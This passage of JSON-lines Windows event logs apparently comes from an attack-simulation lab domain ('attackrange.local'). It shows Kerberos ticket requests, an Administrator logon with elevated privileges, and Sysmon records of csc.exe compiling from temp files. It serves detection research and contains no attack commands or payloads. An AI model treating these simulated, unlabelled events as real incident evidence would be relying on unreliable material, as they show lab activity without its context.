{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5048,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.147\r\nSourceProcessGUID: {E2A3D6B1-11C4-5F25-0000-001043D90600}\r\nSourceProcessId: 4776\r\nSourceThreadId: 1092\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-0010A7FB0600}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.147","SourceProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001043D90600}","SourceProcessId":"4776","SourceThreadId":"1092","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-0010A7FB0600}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220508,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220509,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{FDECF3AC-E370-083A-12EC-ABDC462CE23A}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{FDECF3AC-E370-083A-12EC-ABDC462CE23A}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220510,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{FDECF3AC-E370-083A-12EC-ABDC462CE23A}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{FDECF3AC-E370-083A-12EC-ABDC462CE23A}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220511,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x700D4\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{FDECF3AC-E370-083A-12EC-ABDC462CE23A}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x700d4","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{FDECF3AC-E370-083A-12EC-ABDC462CE23A}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220512,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x700D4\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x700d4","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5049,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.240\r\nProcessGuid: {E2A3D6B1-11C5-5F25-0000-001046FF0600}\r\nProcessId: 4364\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESA772.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSC4369FE6F42354237B8B27619E992C677.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11C4-5F25-0000-002093D80600}\r\nLogonId: 0x6D893\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {E2A3D6B1-11C5-5F25-0000-0010A7FB0600}\r\nParentProcessId: 4800\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\p54jafaw.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.240","ProcessGuid":"{E2A3D6B1-11C5-5F25-0000-001046FF0600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESA772.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSC4369FE6F42354237B8B27619E992C677.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11C4-5F25-0000-002093D80600}","LogonId":"0x6d893","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{E2A3D6B1-11C5-5F25-0000-0010A7FB0600}","ParentProcessId":"4800","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\p54jafaw.cmdline\"","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5050,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.240\r\nSourceProcessGUID: {E2A3D6B1-11C5-5F25-0000-0010A7FB0600}\r\nSourceProcessId: 4800\r\nSourceThreadId: 1476\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-001046FF0600}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.240","SourceProcessGUID":"{E2A3D6B1-11C5-5F25-0000-0010A7FB0600}","SourceProcessId":"4800","SourceThreadId":"1476","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-001046FF0600}","TargetProcessId":"4364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5051,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.240\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11C5-5F25-0000-001046FF0600}\r\nTargetProcessId: 4364\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.240","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11C5-5F25-0000-001046FF0600}","TargetProcessId":"4364","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5052,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:01.240\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:01.240","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\S